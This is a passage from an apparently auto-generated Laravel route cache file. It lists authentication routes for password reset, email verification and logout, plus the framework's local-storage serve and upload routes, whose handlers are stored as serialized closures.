'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'reset-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'guest',
),
'uses' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\NewPasswordController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.notice' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'verify-email',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\EmailVerificationPromptController@__invoke',
'controller' => 'App\\Http\\Controllers\\Auth\\EmailVerificationPromptController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.notice',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.verify' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'verify-email/{id}/{hash}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'signed',
3 => 'throttle:6,1',
),
'uses' => 'App\\Http\\Controllers\\Auth\\VerifyEmailController@__invoke',
'controller' => 'App\\Http\\Controllers\\Auth\\VerifyEmailController',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.verify',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.send' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'email/verification-notification',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'throttle:6,1',
),
'uses' => 'App\\Http\\Controllers\\Auth\\EmailVerificationNotificationController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\EmailVerificationNotificationController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.send',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.confirm' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'confirm-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@show',
'controller' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.confirm',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'generated::DmlkrwcDggqengeg' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'confirm-password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\ConfirmablePasswordController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'generated::DmlkrwcDggqengeg',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'password',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\PasswordController@update',
'controller' => 'App\\Http\\Controllers\\Auth\\PasswordController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'logout' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'logout',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@destroy',
'controller' => 'App\\Http\\Controllers\\Auth\\AuthenticatedSessionController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'logout',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'storage.local' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'storage/{path}',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:3:{s:4:"disk";s:5:"local";s:6:"config";a:5:{s:6:"driver";s:5:"local";s:4:"root";s:47:"/var/www/html/futuresfunder/storage/app/private";s:5:"serve";b:1;s:5:"throw";b:0;s:6:"report";b:0;}s:12:"isProduction";b:1;}s:8:"function";s:323:"function (\\Illuminate\\Http\\Request $request, string $path) use ($disk, $config, $isProduction) {
return (new \\Illuminate\\Filesystem\\ServeFile(
$disk,
$config,
$isProduction
))($request, $path);
}";s:5:"scope";s:47:"Illuminate\\Filesystem\\FilesystemServiceProvider";s:4:"this";N;s:4:"self";s:32:"000000000000047b0000000000000000";}}',
'as' => 'storage.local',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
'path' => '.*',
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'storage.local.upload' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'storage/{path}',
'action' =>
array (
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:3:{s:4:"disk";s:5:"local";s:6:"config";a:5:{s:6:"driver";s:5:"local";s:4:"root";s:47:"/var/www/html/futuresfunder/storage/app/private";s:5:"serve";b:1;s:5:"throw";b:0;s:6:"report";b:0;}s:12:"isProduction";b:1;}s:8:"function";s:325:"function (\\Illuminate\\Http\\Request $request, string $path) use ($disk, $config, $isProduction) {
return (new \\Illuminate\\Filesystem\\ReceiveFile(
$disk,
$config,
$isProduction
))($request, $path);
}";s:5:"scope";s:47:"Illuminate\\Filesystem\\FilesystemServiceProvider";s:4:"this";N;s:4:"self";s:32:"00000000000004930000000000000000";}}',
'as' => 'storage.local.upload',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
'path' => '.*',
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
),
)
);